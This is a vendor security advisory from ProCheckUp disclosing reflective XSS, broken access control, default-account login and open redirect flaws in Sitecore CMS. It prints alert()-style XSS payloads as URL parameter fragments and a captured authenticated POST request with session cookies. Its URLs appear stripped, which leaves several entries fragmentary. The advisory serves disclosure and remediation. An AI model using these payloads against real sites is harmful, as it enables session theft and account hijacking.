Vulnerability found:
30 November 2010

Vendor informed:
01 December 2010

Severity level:

Richard Brain of ProCheckUp Ltd (

Sitecore is a CMS designed for customers to effortlessly create content and media rich websites. ProCheckUp has discovered that multiple Sitecore pages are vulnerable to reflective XSS attacks, with some pages vulnerable to broken access controls which allows unauthenticated users to gather information and perform limited administrative actions. The Sitecore was also found to be vulnerable to offsite redirection.

Versions tested:-
Version: Sitecore.NET 6.2.0 (rev. 100507)
Version: Sitecore.NET 6.0.0 (rev. 090120)
How to fix:
1) Sitecore is vulnerable to multiple reflective XSS flaws

Multiple XSS vulnerabilities has been found within the Sitecore Content Management System; this arises from insufficient input filtering found within programs.

By using a specially-crafted link, and tricking the victim into clicking on it, an attacker can perform malicious attacks such as the following:
- Hijack user accounts by stealing the victim's cookies that are assigned to the victim's browser by the vulnerable website
- Hijack user accounts by injecting a "fake" html form on the html rendered by the victim's web browser
- Redirect the victim to a malicious third-party website which would perform a phishing attack to steal the user credentials or exploit an vulnerability (i.e.: buffer overflow) on the victim's web browser in order to compromise the victim's workstation


(Works on IE only)</script><script>alert(1)</script>=1

Whether it works depends on the site settings<script>alert(1)</script>&mo=preview><script>alert(1)</script> (Sitecore.NET 6.3.1 (rev. 110112) is still vulnerable)<script>alert(1)</script>&fi=%2ftemp%2fdiagnostics%2ftrace_%7bbb6c83fb-b029-469d-909d-8e1ecf5ecdb1%7d.xml (Sitecore.NET 6.3.1 (rev. 110112) is still vulnerable)

AUTHENTICATED XSS><BODY%20ONLOAD="alert(1)">&mo=preview

Works with IE'-alert(1)-'=1 (Sitecore.NET 6.3.1 (rev. 110112) is still vulnerable)'-alert(1)-'=1 (Sitecore.NET 6.3.1 (rev. 110112) is still vulnerable),usermanager:edituser=1&'-alert(1)-'=1 (Sitecore.NET 6.3.1 (rev. 110112) is still vulnerable)'-alert(1)-'=1 (Sitecore.NET 6.3.1 (rev. 110112) is still vulnerable)"><script>alert(1)</script> (Sitecore.NET 6.3.1 (rev. 110112) is still vulnerable)

The treeid needs to be known for it to work"><script>alert(1)</script>

Authenticated POST (Sitecore.NET 6.3.1 (rev. 110112) is still vulnerable)
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET4.0C; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ; ASP.NET_SessionId=mxwcv545hem0vy45wqqacf55; admin#lang=en; shell#lang=en; .ASPXAUTH=BEA13C8F7D4FADE370B51CAB6B575E28398AA952EA8CEDFBCE2DA4979F14D8F188936DDB6E6126D9F6429B6C03E54882C1BF39A719F3B5D44A9C611522AD473A3274630824C33A4EF4EDE70266FA032C9F3EA5D48E191E93DBC794A0FEDB04B1sitecore_userticket=C1D9F217B41B4047BEFEA39A489EBC26; sc_fv=10.2.152; website#sc_debug=1; website#sc_prof=1; website#sc_trace=1; website#sc_ri=1; sitecore_webedit_ribbon=1; sitecore_webedit_editing=0; website#sc_mode=edit; sitecore_webedit_activestrip=Ribbon_Strip_PageEditorStrip



An attacker may be able to cause execution of malicious scripting code in the browser of a user who clicks on a link to a Sitecore based site. Such code
Would run within the security context of the target domain. This type of attack can result in non-persistent defacement of the target site, or the redirection of
Confidential information (i.e.: session IDs) to unauthorised third parties.

2) Sitecore is vulnerable to authentication bypass by using a built in default accounts.



An attacker may be able to gain access to data held within a Sitecore based site, if the administrators have not changed the password.


Change the default admin password.

3) Sitecore is vulnerable to broken access control, which disclosing confidential information to unathenticated users. (click refresh)

Kick users off

Display the configuration


Used to unlock a locked admin account

And attacker might be able to carry out further attacks using the information found.

4) SiteCore is also vulnerable to offsite redirection, possibly to malicious websites.

(pop ups might need to be allowed)


Apply patches or upgrade to Version: Sitecore.NET 6.3.1 (rev. 110112)


Copyright 2012 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to ProCheckUp, and provided such reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. ProCheckUp is not liable for any misuse of this information by any third party.